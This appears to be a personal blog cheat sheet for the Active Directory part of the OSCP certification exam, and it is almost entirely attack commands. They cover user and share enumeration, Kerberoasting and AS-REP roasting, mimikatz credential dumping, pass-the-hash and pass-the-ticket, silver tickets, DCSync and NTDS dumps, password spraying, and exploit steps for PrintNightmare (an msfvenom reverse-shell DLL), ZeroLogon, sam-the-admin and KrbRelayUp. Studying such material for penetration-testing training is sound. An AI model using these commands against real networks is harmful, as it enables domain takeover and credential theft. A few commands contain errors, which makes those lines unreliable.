26. Apr 2022 - Tips and Tricks for the AD Part of the OSCP Exam
OSCP - AD Cheat Sheet
Here are some tips and tricks that got me thru the AD part of my OSCP exam. Please note that I do not plan on updating this list further down the road. OffSec probably updates their exam regularly so do not rely on this page alone.
Set DNS / hosts
Add the DC and all found clients into your /etc/hosts file.
192.168.99.10 dc1.domain.com dc1 domain.com
192.168.99.20 client1.domain.com client1
You could add the DC to your /etc/resolv.conf. But that will make internet research slower since all your requests would first go and then timeout at the DC.
Get a Shell or Credentials
DNS Recon
Use fierce↗ to check for other servers inside the AD.
fierce --domain DOMAIN --dns-servers DCIP --subdomain-file /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
User Recon
Use windapsearch↗ to make LDAP queries. Often does not require a password!
# Query users
windapsearch -m users --dc DCIP
# Query login names
windapsearch -m users --attrs UserPrincipalName --dc DCIP | awk -F"Name:" '{print $2}' | awk '!/^$/'
# Descriptions (often contain passwords)
windapsearch -m users --attrs Description --dc DCIP
# Query all attributes for password
windapsearch -m users --full --dc DCIP | grep -i password
Use Kerbrute↗ to enumerate users
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/Names/names.txt
kerbrute userenum --dc DC -d DOMAIN /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
Use CrackMapExec↗ to enumerate users
cme IP -u '' -p '' --users
# Get password policy
cme IP -u '' -p '' --pass-poll
Use username-anarchy↗ to format found names on company websites
username-anarchy -i INFILE > OUTFILE
Use cewl↗ to crawl websites for words to pack into a wordlist
cewl -d DEPTH -m MINIMUMLENGT --with-numbers -w OUTFILE LINK
hashcat --force INFILE -r /usr/share/hashcat/rules/best64.rule --stdout > OUTFILE
RPC Recon
# Could require credentials
rpcclient -u '' IP
enumdomusers
enumdomgroups
# Check printer description for passwords
enumprinters
impacket-rpcdump IP
# Check for PrinterNightmare
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
SMB Recon
Check for anonymous/open shares
smbmap -H IP
cme smb IP -u '' -p '' --shares
enum4linux IP
After Shell and or Credentials
Get a Shell
Some ways to get a shell by just having a pair of credentials:
# Common
impacket-psexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-smbexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
impacket-wmiexec 'DOMAIN\user:PASSWORD' -target-ip IP -dc-ip DCIP
# Winrm (tcp/5985) need to be enabled
evil-winrm -i IP -u 'DOMAIN\user' -p 'PASSWORD'
# RDP (tcp+udp/3389) needs to be enabled
rdesktop -r clipboard:PRIMARYCLIPBOARD -r disk:host=/home/ -u 'USER' -p 'PASSWORD' IP
# Quite rare
impacket-atexec 'DOMAIN\user:PASSWORD@IP' 'command'
impacket-dcomexec 'DOMAIN\user:PASSWORD@IP'
Check for ASREPRoast
# AD attrib: DONT_REQ_PREAUTH
impacket-GetNPUsers 'DOMAIN\user:PASSWORD' -dc-ip DCIP
Check for Kerberoast
impacket-GetUserSPNs 'DOMAIN\user:PASSWORD@DCIP'
Basic PowerShell script you can run from a shell inside the AD:
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
# Search by what
$Searcher.filter="serviceprincipalname=*"
$Result = $Searcher.Findall()
Write-Host "---------------------------"
Foreach($obj in $Result)
{
ForEach($prop in $obj.Properties) {
# uncommnent to print all attributes
#$prop
}
Write-Host "[SAM Account Name]"
$obj.Properties.samaccountname
Write-Host ""
Write-Host "[User Principal Name]"
$obj.Properties.userprincipalname
Write-Host ""
Write-Host "[Service Principal Name]"
$obj.Properties.serviceprincipalname
Write-Host "---------------------------"
}
To request the ticket with PowerShell:
add-type -assemblyname system.identitymodel
new-object system.identitymodel.tokens.kerberosrequestorsecuritytoken -Argumentlist 'SPN'
To request the ticket with mimikatz:
.\mimikatz.exe
kerberos::ask /target:SPN
kerberos::list /export
Verify that the ticket is in memory with klist. Then use mimikatz↗ to export the ticket. This does not require admin or SYSTEM privileges.
.\mimikatz.exe
# Verify the ticket exists
kerberos::list
# Export to current folder
kerberos::list /export
Transfer the ticket to Kali, and crack it with kerberoast↗.
# Setup
virtualenv --python=python3 venv
source venv/bin/activate
git clone https://github.com/nidem/kerberoast/
cd kerberoast
pip3 install pyasn1
# Crack
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
Cracking is also possible with Hashcat and kirbi2hashcat↗.
python kirbi2hashcat.py ticket.kirbi > ticket.hashcat
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt
Check for the Big Exploits
Those exploits only require valid domain credentials.
PrinterNightmare
CVE-2021-1675
Check with:
impacket-rpcdump IP | egrep 'MS-RPRN|MS-PAR'
# Terminal 1
cd /SHOME/PATH/SOMEFOLDER
git clone https://github.com/cube0x0/impacket
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/main/CVE-2021-1675.py -O ./impacket/CVE-2021-1675.py
virtualenv --python=python3 impacket
source impacket/bin/activate
cd impacket
pip3 install .
pip2 install .
# Terminal 2
cd /SHOME/PATH/SOMEFOLDER
source impacket/bin/activate
cd impacket
msfvenom -p windows/shell_reverse_tcp LHOST=LISTEINGIP LPORT=LISTENINGPORT -f dll -o evil.dll
smbserver.py drop $(pwd) -smb2support
# Set up listener
# Terminal 1
python3 CVE-2021-1675.py domain.com/user:password@dcip '\\LISTEINGIP\drop\evil.dll'
SAM the Admin
CVE-2021-42278
CVE-2021-42287
git clone https://github.com/WazeHell/sam-the-admin
cd sam-the-admin
virtualenv venv
source venv/bin/activate
pip3 install -r requirements.txt
pip2 install -r requirements.txt
python sam_the_admin.py DOMAIN/USER:PASSWORD -dc-ip DCIP -domain-netbios domain.com
ZeroLogon
CVE-2020-1472
git clone https://github.com/risksense/zerologon/
cd zerologon
# DC NAME NOT FQDN!
python3 set_empty_pw.py DCNAME DCIP
goldenPAC
CVE-2014-6324
impacket-goldenPac 'domain.com/user:password@dc'
Tools
Mimikatz
# Hashdump
.\mimikatz.exe
# Elevate
privilege::debug
# Check for logged on passwords (requiers admin/system)
sekurlsa::logonpasswords
# Dump SAM
lsadump::lsa /patch
# Overpass the Hash
.\mimikatz.exe
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:NTLM /run:cmd
klist
net use \\DC
klist
# Pass the Ticket
.\mimikatz.exe
# Elevate
privilege::debug
# Export the tickets
# Creates .kirbi files in current folder
sekurlsa::tickets /export
# Load Ticket on another client
kerberos::ptt ticket.kirbi
# Silver Ticket
.\mimikatz.exe
# Elevate
privilege::debug
kerberos::purge
kerberos::golden /user:USER /domain:DOMAIN /sid:DOMAINSID /target:HOSTNAMETARGET /service:SPNTYPE /rce4:SERVICEHASH /ptt
Rubeus
# Harvest TGTs
.\Rubeus.exe harvest /interval:30
# Password Spray
.\Rubeus.exe brute /password:Password1 /noticket
# Kerberoast
.\Rubeus.exe kerberoast
# Crack on Kali with
hashcat --force ticket.hashcat -m 13100 /usr/share/wordlists/rockyou.txt
# ASREProast
.\Rubeus.exe asreproast
# Crack on Kali with
hashcat --force hash -m 18200 /usr/share/wordlists/rockyou.txt
CrackMapExec
# Get users
cme smb IP -u USER -d DOMAIN -p PASSWORD --users
# Get shares
cme smb IP -u USER -d DOMAIN -p PASSWORD --shares
# Bruteforce
cme smb IP -u USERLIST -p PWLIST --continue-on-success
Bloodhound
# Start on Kali
sudo neo4j console
bloodhound --no-sandbox
# Remotely
bloodhound-python -u USER -p PASSWORD -d DOMAIN -ns IP -c All
# Client
. .\Sharphound.ps1
Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
.\sharphound.exe --CollectionMethod All --Domain CONTROLLER.local --ZipFileName loot.zip
Other Techniques
KrbRelayUp
Will get you a local SYSTEM shell if LDAP Signing and LDAP Channel Binding are not enforced
# https://github.com/Dec0ne/KrbRelayUp
# Do not use cmd.exe or powershell.exe. Those will spawn on desktop not in shell
.\KrbRelayUp.exe relay -d domain.com -c -cn evilpc$ -cp rockyou@123
.\KrbRelayUp.exe spawn -d domain.com -cn evilpc$ -cp rockyou@123 -s evilservice1 -sc "evil1.exe"
# After the first two have been executed once
.\KrbRelayUp.exe krbscm -s evilservice2 -sc "evil1.exe"
Pass the Hash
Works only on servers with NTML authentication.
pth-winexe -U USERHASH //IP cmd
evil-winrm -i IP -u USERNAME -H HASH
Dump local SAM and Crack Hashes
On Windows
# Needs Admin
reg save hklm\sam sam.out
reg save hklm\system system.out
On Kali
samdump sam.out system.out -o hashes.txt
hashcat --force hashes.txt -m 1000 /usr/share/wordlists/rockyou.txt
john hashes.txt -format=nt -wordlist /usr/share/wordlists/rockyou.txt
Dump the NTDS
secretsdump.py -ntds ntds.dit -security registry/SECURITY -system registry/SYSTEM local -pwd-last-set -user-status -history
DC Sync Attack
Needs GetChangesAll
secretsdump.py DOMAIN/USER@DCIP
secretsdump.py DOMAIN/USER@DCIP -just-dc-user USERTOGETHASH
SPN Impersonate
Needs TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
# We need to have the same time as the DC
# Stop getting time from vhost
sudo service virtualbox-guest-utils stop
# Update time from DC
sudo service sudo ntpdate DCIP
getST.py -dc-ip DCIP -spn SPN -hashes HASHFROMDOMUSER -impersonate administrator DOM/USER
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k DOMAIN/Administrator@DC -no-pass
# Revert NTP to VBox
sudo service virtualbox-guest-utils start
Show LAPS Passwords
If an owned user is either LAPS admin or just LAPS reader:
ldapsearch -v -x -D USER@DOMAIN -w PASSWORD -b "DC=DOMAIN,DC=com" -h DCIP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd